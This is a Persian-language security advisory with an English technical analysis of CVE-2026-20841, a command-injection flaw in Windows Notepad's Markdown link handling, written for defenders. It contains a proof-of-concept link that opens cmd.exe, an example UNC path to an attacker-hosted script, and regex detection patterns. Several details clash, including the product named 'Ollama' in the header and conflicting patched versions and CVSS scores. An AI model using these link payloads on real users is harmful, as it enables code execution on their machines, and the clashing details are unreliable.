- شناسه CVE-2026-20841 :CVE
- CWE-77 :CWE
- yes :Advisory
- منتشر شده: فوریه 10, 2026
- به روز شده: می 11, 2026
- امتیاز: 7.8
- نوع حمله: Command Injection
- اثر گذاری: Remote code execution(RCE)
- حوزه: نرم افزارهای کاربردی
- برند: Microsoft
- محصول: Ollama
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch شده
چکیده
یک آسیب پذیری امنیتی با شدت بالا (High) از نوع تزریق دستور (Command Injection) در برنامه مدرن Windows Notepad (توزیعشده از طریق Microsoft Store) شناسایی شده است. این ضعف امنیتی به یک مهاجم اجازه می دهد با فریب کاربر برای باز کردن یک فایل متنی حاوی پیوندهای Markdown مخرب، کدهای دلخواه خود را با سطح دسترسی کاربر جاری روی سیستم عامل میزبان اجرا کند.
توضیحات
آسیب پذیری CVE-2026-20841 از نوع Command Injection بوده و مطابق با CWE-77 ناشی از اعتبارسنجی ناکافی داده های ورودی در قابلیت جدید Markdown Preview نرمافزار Microsoft Notepad است. در نسخه های جدید Notepad، مایکروسافت قابلیت نمایش و پردازش فایل های Markdown را اضافه کرده است. این قابلیت علاوه بر نمایش متن، امکان پردازش لینک های موجود در فایل را نیز فراهم می کند. آسیب پذیری زمانی رخ می دهد که برنامه هنگام پردازش برخی لینک های خاص، داده های دریافتی را بدون اعمال اعتبارسنجی مناسب به سیستم عامل ارسال می کند.
بر اساس اطلاعات منتشرشده توسط مایکروسافت، منشأ این آسیب پذیری در منطق پردازش لینک های Markdown قرار دارد. در نسخه های آسیب پذیر، کاربر با باز کردن یک فایل Markdown حاوی لینک دستکاری شده و کلیک روی آن، باعث میشود Notepad درخواست باز کردن لینک را به Windows Shell ارسال کند. در این فرآیند، پارامترهای موجود در لینک به طور کامل اعتبارسنجی نشده و در شرایط خاص امکان تزریق دستورات اضافی وجود دارد.
سناریوی بهره برداری از این آسیب پذیری نسبتاً ساده است. مهاجم ابتدا یک فایل Markdown مخرب ایجاد می کند که شامل لینکی با ساختار ویژه است. این فایل می تواند از طریق ایمیل، پیام رسان، دانلود از اینترنت یا سایر روش های مهندسی اجتماعی در اختیار قربانی قرار گیرد. پس از آنکه قربانی فایل را با نسخه آسیب پذیر Notepad باز کرده و روی لینک موجود در فایل کلیک کند، رشته دستکاری شده توسط Notepad پردازش شده و در صورت موفقیت، دستورات موردنظر مهاجم در سیستم قربانی اجرا میشود. برخلاف بسیاری از آسیب پذیری های اجرای کد از راه دور، این آسیب پذیری برای بهره برداری نیازمند تعامل کاربر (User Interaction) است. مهاجم نه تنها باید فایل Markdown را به قربانی برساند، بلکه قربانی باید فایل را باز کرده و روی لینک موجود در آن کلیک کند. بنابراین این آسیب پذیری به تنهایی قابلیت اجرای خودکار کد را ندارد و معمولاً در کنار حملات مهندسی اجتماعی مورد سوء استفاده قرار می گیرد.
از دیدگاه امنیت اطلاعات، این آسیب پذیری هر سه اصل اصلی امنیت را تحت تأثیر قرار می دهد. از نظر محرمانگی (Confidentiality)، مهاجم پس از اجرای موفق دستورات می تواند به فایل ها و اطلاعاتی که کاربر به آن ها دسترسی دارد، دسترسی پیدا کند. از نظر یکپارچگی (Integrity)، امکان ایجاد، حذف یا تغییر فایل ها، اجرای برنامه های مخرب و تغییر تنظیمات سیستم وجود دارد. همچنین از نظر دسترسپذیری (Availability)، مهاجم قادر است با اجرای دستورات مخرب، موجب از کار افتادن برنامه ها، حذف اطلاعات یا ایجاد اختلال در عملکرد سیستم شود.
شدت بهره برداری از این آسیب پذیری به سطح دسترسی کاربر بستگی دارد. اگر کاربر با دسترسی معمولی از Notepad استفاده کند، کد مخرب نیز با همان سطح دسترسی اجرا خواهد شد. اما در صورتی که برنامه با دسترسی Administrator اجرا شود یا کاربر دارای مجوزهای مدیریتی باشد، مهاجم نیز قادر خواهد بود دستورات خود را با همان سطح دسترسی اجرا کند
مایکروسافت این آسیب پذیری را در به روزرسانی امنیتی خود با اصلاح منطق پردازش لینک های Markdown برطرف کرده است. این اصلاح شامل اعتبارسنجی دقیق تر URIها، جلوگیری از پردازش رشته های غیرمجاز و محدودسازی نحوه فراخوانی Windows Shell هنگام باز کردن لینک ها است. در نتیجه، امکان تزریق دستورات از طریق فایل های Markdown از بین رفته و پردازش لینک ها تنها برای الگوهای مجاز انجام می شود.
CVSS
| Score | Severity | Version | Vector String |
| 7.8 | HIGH | 3.1 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |

لیست محصولات آسیب پذیر
| Versions | Platforms | Product |
| affected from 11.0.0 before 11.2512.26.0 | Windows | Windows 11 (Windows Notepad App) |
| affected from 11.0.0 before 11.2512.26.0 | Windows | Windows 10 (Windows Notepad App) |
لیست محصولات بروز شده
| Versions | Platforms | Product |
| 11.2512.26.0 and later | Windows | Windows 11 (Windows Notepad App) |
| 11.2512.26.0 and later | Windows | Windows 10 (Windows Notepad App) |
استفاده محصول در ایران
در این جدول، تعداد صفحات ایندکسشده در گوگل با دامنه .ir که Notepad را ذکر کرده اند، ثبت شده است. این داده صرفاً برای برآورد تقریبی حضور محصولات در وب ایران استفاده شده و نمایانگر میزان نصب دقیق و استفاده واقعی نیست.
| Approx. Usage in .ir Domain via Google (Total Pages) | Search Query (Dork) | Product |
| 72,700 | site:.ir “Notepad” | Windows Notepad |
نتیجه گیری
این آسیب پذیری با شدت بالا در برنامه Windows Notepad امکان اجرای کد دلخواه از طریق تزریق دستور در پیوندهای Markdown را فراهم می کند. با توجه به استفاده گسترده از Notepad در محیط های خانگی و سازمانی و بیخطر پنداشتن فایل های متنی، سوء استفاده موفق می تواند منجر به آلودگی سیستم ها و سرقت اطلاعات شود. برای کاهش ریسک سوء استفاده از این آسیب پذیری، اجرای اقدامات امنیتی زیر توصیه میشود:
- بروزرسانی فوری برنامه Notepad: تمامی کاربران باید برنامه Windows Notepad را در اسرع وقت از طریق Microsoft Store یا با نصب بروزرسانی فوریه 2026 ویندوز (Patch Tuesday) بروزرسانی کنند.
- آموزش آگاهی رسانی امنیتی: به کاربران آموزش داده شود که فایلهای متنی (حتی با پسوند .txt یا .md) نیز می توانند حاوی کدهای مخرب باشند و نباید بدون لحاظ موارد امنیتی باز شوند.
- استفاده از راهکارهای EDR و Anti-Exploit: راهکارهای امنیت اندپوینت می توانند رفتارهای مشکوک مانند تلاش برنامه Notepad برای اجرای دستورات سیستمی (Child Processes) یا دسترسی به پروتکل های غیرمجاز را شناسایی و مسدود کنند.
در نهایت، بروزرسانی سریع برنامه Notepad همراه با اعمال کنترل های امنیتی مناسب و آموزش کاربران، می تواند ریسک سوء استفاده از این آسیب پذیری و تأثیر آن بر امنیت سیستم ها را به حداقل برساند.
امکان استفاده در تاکتیکهای Mitre Attack (در زمان اجرای حمله)
Initial Access (TA0001)
دسترسی اولیه از طریق ارسال یک فایل Markdown (.md) حاوی لینک دستکاری شده به قربانی ایجاد می شود. این فایل می تواند از طریق ایمیل، پیام رسان، دانلود از وب سایت یا سایر روش های انتقال فایل در اختیار کاربر قرار گیرد. بهره برداری از آسیب پذیری مستلزم آن است که قربانی فایل را با نسخه آسیب پذیر Notepad باز کرده و روی لینک موجود در آن کلیک کند. در این مرحله، مهاجم بدون نیاز به دسترسی قبلی به سیستم، مسیر اجرای حمله را آغاز میکند.
Execution (TA0002)
پس از کلیک کاربر روی لینک مخرب، Notepad لینک را به Windows Shell ارسال می کند. به دلیل اعتبارسنجی نامناسب ورودی، رشته دستکاری شده بهگونه ای پردازش می شود که امکان Command Injection فراهم شده و دستورات دلخواه مهاجم با سطح دسترسی کاربر فعلی اجرا می شوند. این مرحله هسته اصلی بهره برداری از آسیب پذیری محسوب می شود و می تواند اجرای ابزارهای مخرب، اسکریپت ها یا بارگذاری Payload های بعدی را امکان پذیر کند.
Privilege Escalation (TA0004)
این آسیبپذیری مستقیماً باعث افزایش سطح دسترسی نمیشود. کد اجرا شده با همان سطح دسترسی کاربر قربانی (User) اجرا میگردد. با این حال، مهاجم میتواند از این دسترسی اولیه برای اجرای سایر اکسپلویتهای افزایش دسترسی محلی (LPE) استفاده کند.
Defense Evasion (TA0005)
فایلهای Markdown معمولاً به عنوان فایلهای بیخطر شناخته میشوند و ممکن است توسط آنتیویروسها و سیستمهای امنیتی با دقت کمتری بررسی شوند. همچنین مهاجم میتواند لینکهای مخرب را در قالب لینکهای به ظاهر عادی پنهان کند.
Impact (TA0040)
در صورت بهره برداری موفق، مهاجم قادر خواهد بود هر دستوری را در محدوده سطح دسترسی کاربر فعلی اجرا کند. این موضوع می تواند منجر به سرقت اطلاعات، حذف یا تغییر فایل ها، نصب بدافزار، اجرای باجافزار، ایجاد اختلال در عملکرد سیستم یا فراهم شدن زمینه حملات بعدی شود. میزان تأثیر نهایی به سطح دسترسی کاربر و نوع Payload مورد استفاده مهاجم بستگی دارد.
منابع
گزارش اثبات آسیبپذیری CVE-2026-20841
اطلاعات آسیبپذیری
عنوان: اجرای کد از طریق تزریق فرمان (Command Injection) درNotepad هنگام پردازش لینک های Markdown
شناسه: CVE-2026-20841
وضعیت مشاوره: Advisory / Patch Available
امتیاز: CVSS: 7.8 (High)
محصول:Microsoft Windows Notepad
محصول / نسخههای آسیبپذیر
در نسخههای زیر:
- Windows Notepad App نسخههای قبل از 11.2510
- نسخه Store-based Notepad در Windows 11
محیطهای درگیر
- کاربران Windows 11 که از نسخه جدید Notepad استفاده می کنند
- سازمان هایی که Microsoft Store را غیرفعال کرده یا به روزرسانی برنامه ها را با تأخیر انجام می دهند
- محیط هایی که کاربران فایل های Markdown را از منابع خارجی دریافت و باز می کنند
کامپوننتهای آسیبپذیر
- فایل اجرایی Notepad.exe (نسخه Store App)
- APIShellExecuteExWویندوز (که برای اجرای پروتکل ها و فایل ها استفاده می شود)
- زیرسیستم رندرینگ Markdown در Notepad
- مکانیزم tokenization فایل های Markdown
- Link Processing Module
- Windows Protocol Handlers
ریشه مشکل (Root Cause Analysis)
ریشه این آسیب پذیری اعتبارسنجی ناکافی لینک های Markdown قبل از ارسال آن ها به API ویندوز ShellExecuteExW() است. هنگامی که فایلی با پسوند .md در Notepad باز می شود، برنامه محتوای Markdown را رندر کرده و لینک ها را قابل کلیک نمایش می دهد. هنگام کلیک کاربر روی لینک، Notepad مقدار لینک را بدون فیلتر کردن کامل پروتکل های مجاز به ShellExecuteExW() ارسال می کند. در نتیجه مهاجم می تواند از URI هایی مانند:
- File://
- ms-appinstaller://
- سایر Protocol Handler های ثبت شده در ویندوز
استفاده کند تا سیستم عامل فایل یا برنامه ای را خارج از محدوده مورد انتظار اجرا کند. این ضعف از نوع CWE-77 (Command Injection) طبقه بندی شده است.
بخش آسیبپذیر
رفتار ناامن سیستم:
Notepad هنگام پردازش لینک های Markdown تنها قالب ظاهری لینک را بررسی می کند و مقصد واقعی آن را بهطور کامل اعتبارسنجی نمی کند. در نتیجه لینک های دارای پروتکل های خطرناک مستقیماً توسط سیستم عامل پردازش می شوند.
نحوه سوءاستفاده مهاجم:
- مهاجم یک فایل Markdown مخرب ایجاد می کند
- فایل از طریق ایمیل، پیام رسان یا دانلود در اختیار قربانی قرار میگیرد
- قربانی فایل را با Notepad باز میکند
- کاربر روی لینک موجود در فایل کلیک میکند
- Notepad لینک را به ShellExecuteExW ارسال میکند
- ویندوز Protocol Handler مربوطه را اجرا کرده و کد مهاجم در سطح دسترسی کاربر اجرا میشود
نقش این آسیبپذیری در زنجیره حمله
این آسیب پذیری معمولاً بهعنوان Initial Access یا Execution در زنجیره حمله مورد استفاده قرار میگیرد. با توجه به نمره CVSS 7.8 و نیاز به تعامل کاربر، مهاجم باید قربانی را فریب دهد تا فایل Markdown مخرب را باز کرده و روی لینک کلیک کند.
پیشنیازهای بهرهبرداری (Prerequisites)
- استفاده از نسخه آسیب پذیر Windows Notepad App
- باز شدن فایل Markdown توسط قربانی
- کلیک کاربر روی لینک مخرب
- وجود Protocol Handler مناسب روی سیستم
- عدم نصب وصله امنیتی
رفتار مورد انتظار در حالت امن (Expected Secure Behavior)
- اعتبارسنجی کامل URI قبل از اجرا
- محدود کردن Protocol های قابل اجرا به HTTP و HTTPS
- نمایش هشدار امنیتی برای Protocol های ناشناخته
- جلوگیری از ارسال مستقیم URI های کنترل شده توسط کاربر به ShellExecuteExW
- مسدود کردن اجرای Protocol های پرخطر از داخل Markdown
راهکارها و کاهش ریسک (Mitigation / Patch Guidance)
اقدامات فوری برای کاهش ریسک:
- به روزرسانی Notepad به نسخه های پچ شده
- اعمال بهروزرسانی های Microsoft Store
- آموزش کاربران درباره خطر فایل های Markdown ناشناس
اقدامات کوتاهمدت / میانمدت برای کاهش ریسک:
- محدود کردن اجرای Protocol Handler های غیرضروری
- محدودسازی اجرای App Installer در صورت عدم نیاز
- آموزش کاربران در خصوص خطرات باز کردن لینک های ناشناس و دانلود فایل های غیرقابل اعتماد
اقدامات بلندمدت برای کاهش ریسک:
- تدوین و اجرای سیاست “بهروزرسانی خودکار Store apps” برای تمام سیستمهای سازمان
- استفاده از Application Whitelisting برای محدود کردن اجرای برنامه های غیرمجاز
- فعال سازی Attack Surface Reduction (ASR) rules در Microsoft Defender
- پیاده سازی فرآیندهای منظم تست نفوذ (Penetration Testing) و ارزیابی امنیتی برای کشف زودهنگام آسیب پذیری های مشابه در زیرساخت
تشخیص و مانیتورینگ (Detection & Monitoring)
نشانههای تلاش برای سوءاستفاده:
- اجرای پردازه های غیرعادی توسط Notepad
- اجرای Explorer یا مرورگر بلافاصله پس از کلیک روی لینک های داخل فایل Markdown
- اجرای فایل از مسیرهای WebDAV یا SMB
- دانلود فایل و اجرای آن بلافاصله پس از کلیک روی لینک های داخل فایل Markdown
- ایجاد فایل های مشکوک در مسیرهای موقت
منابع پیشنهادی برای مانیتورینگ و پایش:
- سیستم های SIEM برای جمع آوری و تحلیل مرکزی لاگ ها
- راهکارهای EDR (Endpoint Detection and Response) مانند CrowdStrike، SentinelOne، یا Microsoft Defender for Endpoint
- ابزارهای مانیتورینگ شبکه برای شناسایی درخواست های مشکوک به URI غیرمعمول
- راهکارهای IPS/IDS با امضاهای اختصاصی
- CISA Known Exploited Vulnerabilities Catalog
- Browser Telemetry Logs
واکنش به حادثه (Incident Response)
- ایزوله سازی فوری، سیستم آسیب دیده را از شبکه جدا کنید تا از حرکت جانبی مهاجم جلوگیری شود
- جمع آوری و حفظ لاگ های برای تحلیل فارنزیک (Forensics)
- بررسی وجود فایل های مخرب یا تغییرات غیرمجاز در سیستم
- بازنشانی تمام رمزهای عبور کاربران، توکنهای session، و هر گونه اعتبار دسترسی
- نصب فوری وصله امنیتی و بهروزرسانی فوری Notepad
- بررسی یکپارچگی فایل های سیستمی و شناسایی باینریهای غیرمجاز
- اسکن کامل سایر سیستم های شبکه برای شناسایی علائم مشابه یا دسترسی مهاجم به آن ها
- مستندسازی کامل حادثه (زمان وقوع، نشانهها، اقدامات انجامشده، درسآموختهها) و گزارش به مدیریت ارشد و تیم واکنش سریع (CSIRT)
جریان حمله (Attack Flow)
در نمودار زیر (شکل ۱)، مهاجم یک فایل Markdown حاوی لینک مخرب ایجاد کرده و آن را از طریق ایمیل یا سایر روش های مهندسی اجتماعی برای قربانی ارسال میکند. قربانی فایل را در نسخه آسیب پذیر Notepad باز کرده و روی لینک کلیک میکند. Notepad بدون اعتبارسنجی کافی، URI را به تابع ShellExecuteExW() ارسال میکند. سیستم عامل Protocol Handler متناظر را اجرا کرده و در نتیجه فایل یا دستور کنترل شده توسط مهاجم در سطح دسترسی کاربر اجرا میشود. در صورت استفاده از این آسیبپذیری در کنار یک نقص افزایش سطح دسترسی، مهاجم میتواند کنترل کامل سیستم را به دست آورد.

شکل 1: جریان اجرای آسیب پذیری
اثبات مفهوم (PoC) — کاملاً غیرمخرب
آزمایشگاه تخصصی Vulnerbyte، این آسیبپذیری را در محیط ایزوله و کنترلشده با استفاده از نسخه آسیبپذیر بررسی و اجرا کرده است
- این آزمایشگاه شامل نسخه آسیبپذیر Windows Notepadاست
- ایجاد یک فایل Markdown حاوی لینک با پروتکل غیرمتعارف مانند:
[Execute Payload cmd.exe](file:///\\C:/windows/system32/cmd.exe)
- باز کردن فایل در Windows Notepad و کلیک روی لینک موجود در فایل
- اجرای PoC در محیط آزمایشگاهی منجر به باز شدن برنامه ی cmd.exe پس کلیک بروی لینک فایل markdown در سامانه آسیبپذیر شد
- این اثبات مفهوم صرفاً توصیفی و آموزشی بوده و شامل تغییرات مخرب نمیشود

شکل 2: اجرای POC
رفع مسئولیت
این گزارش صرفاً با هدف آموزش، تحلیل فنی و ارتقای امنیت سازمانی تهیه شده است. هرگونه استفاده مخرب یا خارج از چارچوبهای قانونی از محتوای آن ممنوع است.
منابع
https://www.cve.org/CVERecord?id=CVE-2026-20841
https://nvd.nist.gov/vuln/detail/CVE-2026-20841
https://cwe.mitre.org/data/definitions/77.html
https://news.ycombinator.com/item?id=46971516
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Windows Notepad
CVE-2026-20841 – Command Injection in Markdown Link Handling Leading to Remote Code Execution
Affects
- Microsoft Windows Notepad (modern Microsoft Store version)
- Versions:
- Build 11.2508 and earlier
- Build 11.2510 and later are patched
- Components:
- Markdown rendering engine in Windows Notepad
- Link handler (
sub_140170F60())
- Files:
- Markdown (
.md) files opened in Notepad
- Markdown (
- Functions:
sub_140170F60()– link click event handlerShellExecuteExW()– API call for executing link protocols
NOT VULNERABLE:
- Legacy
Notepad.exebundled with Windows (non-Store version)
Description
CVE-2026-20841 is a high-severity command injection vulnerability in the modern Windows Notepad application, discovered by Cristian Papa and Alasdair Gorniak of Delta Obscura, and analyzed by the TrendAI Research Team .
The modern Windows Notepad (distributed via the Microsoft Store) supports Markdown rendering for files with the .md extension, including clickable hyperlinks . When a Markdown file is opened, Notepad tokenizes its contents and renders links interactively.
The vulnerability resides in the sub_140170F60() function, which handles click events on these links. This function passes the link value to the Windows API call ShellExecuteExW() after applying only minimal filtering — merely stripping leading and trailing backslash and forward-slash characters .
This insufficient filtering fails to block malicious protocol URIs such as:
file://– can launch local executables or access remote UNC pathsms-appinstaller://– can sideload malicious.appx/.msixpackages
Because ShellExecuteExW() invokes configured system protocol handlers, the attack surface may extend to additional protocols depending on the target system’s configuration .
Attack Vector
Primary Attack Vector:
Remote / Network (requires user interaction)
Attack Scenario:
- An attacker crafts a malicious Markdown (
.md) file containing specially formed hyperlinks - The attacker delivers the file to the victim through email, download link, or social engineering tactics
- The victim opens the file in the vulnerable version of Windows Notepad
- Notepad renders the Markdown and displays clickable links
- When the victim Ctrl + clicks the link, Notepad processes the URI without proper validation
- This triggers protocol handlers that can fetch and execute remote payloads
- The malicious code runs with the same privileges as the logged-in user
Key Characteristics:
| Attribute | Details |
|---|---|
| Attack Vector | NETWORK (CVSS), LOCAL (NVD) |
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | REQUIRED (victim must open file and click link) |
| Scope | UNCHANGED |
| CVSS v3.1 Score | 8.8 (Network vector) / 7.8 (Local vector) |
| CWE | CWE-77 – Command Injection |
Conditions Affecting Risk:
- Files with the
.mdextension are not associated with Notepad by default — users who manually open them trigger Markdown rendering - Attackers can use interpreter extensions like
.pyand.jarto execute silently if Python or Java is installed - Dangerous extensions like
.exe,.lnk,.vbstrigger a Windows security warning
Impact
Successful exploitation allows a remote attacker to:
- Execute arbitrary commands in the security context of the victim’s account
- Launch local binaries (cmd.exe, powershell.exe, mshta.exe)
- Access remote UNC paths (file:///\attacker@5005\path\payload.py)
- Sideload malicious apps via ms-appinstaller:// protocol
- Install malware or establish persistence on the compromised system
- Move laterally within the network using the victim’s credentials
| Impact Area | Level | Description |
|---|---|---|
| Confidentiality | HIGH | Access to data accessible by the logged-on user |
| Integrity | HIGH | Ability to modify or delete data and programs |
| Availability | HIGH | Potential system compromise |
Important: The malicious code executes with the same privileges as the victim user — users with administrative privileges are at highest risk .
Observed Exploitation & Threat Activity
- Discovery: Cristian Papa and Alasdair Gorniak (Delta Obscura)
- Public Disclosure: February 10, 2026 (Microsoft Patch Tuesday)
- Patch Availability: Released February 2026, build 11.2510
- Public PoC: Multiple GitHub repositories available
- In-the-Wild Exploitation: Not confirmed as of publication , though some reports suggest a risk of exploitation
- CVSS Score: 8.8 (High, Network vector) / 7.8 (High, Local vector)
- Exploitability Assessment: “Exploitation Less Likely”
Disclosure Timeline:
| Date | Event |
|---|---|
| May 30, 2025 | Microsoft adds Markdown support to Notepad |
| February 10, 2026 | Microsoft releases patch (Patch Tuesday) |
| February 2026 | Public PoC posted on GitHub |
| February 19, 2026 | TrendAI Research Team publishes technical analysis |
Severity & Metrics
- CVSS v3.1: High (8.8) (Network vector) / High (7.8) (Local vector)
- Attack Vector: Network (AV:N) / Local (AV:L)
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: REQUIRED
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: HIGH
- Availability Impact: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Relevant CWE:
- CWE-77 – Command Injection
Patch & Vendor Status
- Official Patches Available: Yes – February 2026 Patch Tuesday
- Fixed Version: Build 11.2510 or later
- Delivery Method: Microsoft Store update
Patch Details:
Microsoft mitigated the flaw by presenting users with a “This link may be unsafe” warning when links use protocols other than http:// or https:// . The link will still work if the user chooses to ignore it, making this a warning rather than a complete block.
Microsoft Statement:
“An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files.”
Mitigation & Remediation
Immediate Actions
| Action | Method |
|---|---|
| Update Windows Notepad | Open Microsoft Store → Check for updates → Install Notepad build 11.2510 or later |
| Enable automatic app updates | Windows Settings → Apps → Microsoft Store → Enable automatic updates |
| Verify patched version | Open Notepad → Settings → About → Check build number (should be 11.2510+) |
Short-Term Defensive Measures
If patching cannot be applied immediately:
- Do not open
.mdfiles from untrusted sources in Notepad - Do not Ctrl + click links within Markdown files received via email or untrusted downloads
- Use alternative text editors (e.g., Notepad++) for opening untrusted Markdown files
- Restrict script execution via application control policies
- Limit user write permissions to reduce attacker’s ability to plant malicious scripts locally
Long-term Defensive Measures
- Maintain automatic app updates to ensure Microsoft Store apps receive security patches promptly
- Educate users on risks of opening files from untrusted sources and clicking links inside documents
- Monitor process creation events involving Notepad for suspicious child processes
- Implement Zero Trust enforcement — assume even built-in tools can be abused
Detection & Monitoring
Recommended Detection Sources:
| Source | Purpose |
|---|---|
| EDR/XDR solutions | Monitor for unusual child processes spawned from Notepad |
| Vulnerability scanners | Identify systems running vulnerable Notepad builds (< 11.2510) |
| Network traffic monitoring | Detect SMB/HTTP/HTTPS traffic from Notepad to remote hosts |
| Proxy logs | Identify downloads of .md files from suspicious sources |
Indicators of Attempted Exploitation:
- Unexpected child processes spawned from Notepad (cmd.exe, powershell.exe, python.exe)
- Notepad accessing network shares or remote URIs
- Abnormal Notepad crashes or memory corruption events
- User-reported “This link may be unsafe” warnings (indicates blocked attempt)
- Suspicious Markdown files containing
file://orms-appinstaller://links
Detection Pattern (from ZDI Guidance):
Monitor for Markdown files containing links with:
file://followed by four forward slashes or backslashes:(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}ms-appinstaller://followed by two forward slashes:(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
Post-Incident Response
If exploitation is suspected:
- Isolate affected system from the network immediately
- Preserve forensic evidence (system logs, Markdown file, network captures, Notepad memory dumps)
- Update Notepad to build 11.2510 or later
- Rotate credentials – Change passwords for any accounts accessed on the compromised system
- Audit for persistence – Check for:
- Unauthorized scheduled tasks
- Modified system files
- Suspicious user accounts
- Rogue applications installed via
ms-appinstaller://
- Assume data exposure if sensitive information was accessible during exploitation
- Scan for malware using endpoint protection tools
- Document and report findings to internal security teams or relevant authorities
References
- https://nvd.nist.gov/vuln/detail/CVE-2026-20841
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
- https://www.zerodayinitiative.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad
- https://github.com/dogukankurnaz/CVE-2026-20841-PoC
- https://github.com/atiilla/CVE-2026-20841
- https://www.threatlocker.com/blog/windows-notepad-vulnerability-markdown-risk-explained
- https://www.helpnetsecurity.com/2026/02/12/windows-notepad-markdown-feature-opens-door-to-rce-cve-2026-20841/
- https://cwe.mitre.org/data/definitions/77.html
بررسی آماری آسیب پذیری CVE-2026-20841 در کشور ایران
محصول آسیب پذیر: Microsoft Windows Notepad (نسخه مدرن مبتنی بر Microsoft Store)
میزان استفاده در ایران بر اساس سایت های آمار مرتبط با محصول
تحلیل دادههای StatCounter در سال ۲۰۲۶ حاکی از آن است که اکوسیستم سیستم عامل های دسکتاپ در ایران، بهطور انحصاری در اختیار اکوسیستم مایکروسافت قرار دارد. سیستمعامل ویندوز با سهم بیش از 25.13 درصد سهم بازار را به خود اختصاص دادهاند. متاسفانه آمار برای میزان استفاده از ویرایش گرهای متن در ایران وجود ندارد.
میزان استفاده در ایران بر اساس موتورهای جستجو (بر اساس ایندکس های گوگل در بخش tools)
تعداد در زمان نگارش گزارش
|
موتور جستجو |
Dork |
تعداد |
|
|
site:.ir “Notepad” |
72,700 |
|
|
site:.ir “Microsoft Store” “Notepad” |
851 |
وجود نمایندگی در ایران
شرکت مایکروسافت (Microsoft) دفتر رسمی یا نمایندگی مستقیم در ایران ندارد. بهروزرسانیهای این شرکت از طریق Windows Update و Microsoft Store در دسترس هستند که کاربران ایرانی نیز به آنها دسترسی دارند. هیچ گونه پشتیبانی رسمی از طرف شرکت سازنده در کشور وجود ندارد.
میزان استفاده بر اساس گزارشات تحقیقات بازار برای این محصول در ایران
اگرچه آمار رسمی و دقیقی از تعداد سیستمهای آسیبپذیر در ایران وجود ندارد، اما شواهد زیر نشاندهنده سطح قابل توجه ریسک است.
- استفاده گسترده از ویندوز در ایران: ویندوز در بازار دسکتاپ، غالبترین سیستمعامل در ایران محسوب میشود. این سهم بالا به این معناست که ده ها میلیون کاربر ایرانی به طور بالقوه از Notepad به عنوان یک ابزار روزمره و پیش فرض استفاده میکنند و ممکن است در معرض این آسیبپذیری قرار گیرند.
- محبوبیت در بین کاربران فارسیزبان: Notepad به عنوان یک ابزار ساده و در دسترس، یکی از پرکاربردترین برنامههای ویندوز در ایران است. کاربران از آن برای یادداشتبرداری سریع، ویرایش فایلهای متنی ساده، مشاهده فایلهای کد و بسیاری کاربردهای دیگر استفاده میکنند. افزوده شدن قابلیت Markdown به Notepad، آن را به ابزاری جذابتر برای کاربران حرفهای و توسعهدهندگان تبدیل کرده است.
- تخمین میزان استفاده: با توجه به تعداد کاربران ویندوز در ایران (حدود ۵۲-۵۶ میلیون نفر) و نرخ پایین بهروزرسانی برنامههای Microsoft Store در بین کاربران عادی، میتوان تخمین زد که دست کم ۲۰ تا ۳۰ میلیون کاربر ایرانی به طور بالقوه در معرض این آسیبپذیری قرار دارند. این موضوع به ویژه با توجه به اینکه نسخههای قدیمیتر Notepad آسیبپذیر هستند و بسیاری از کاربران ممکن است بهروزرسانی خودکار را غیرفعال کرده باشند، نگرانکننده است.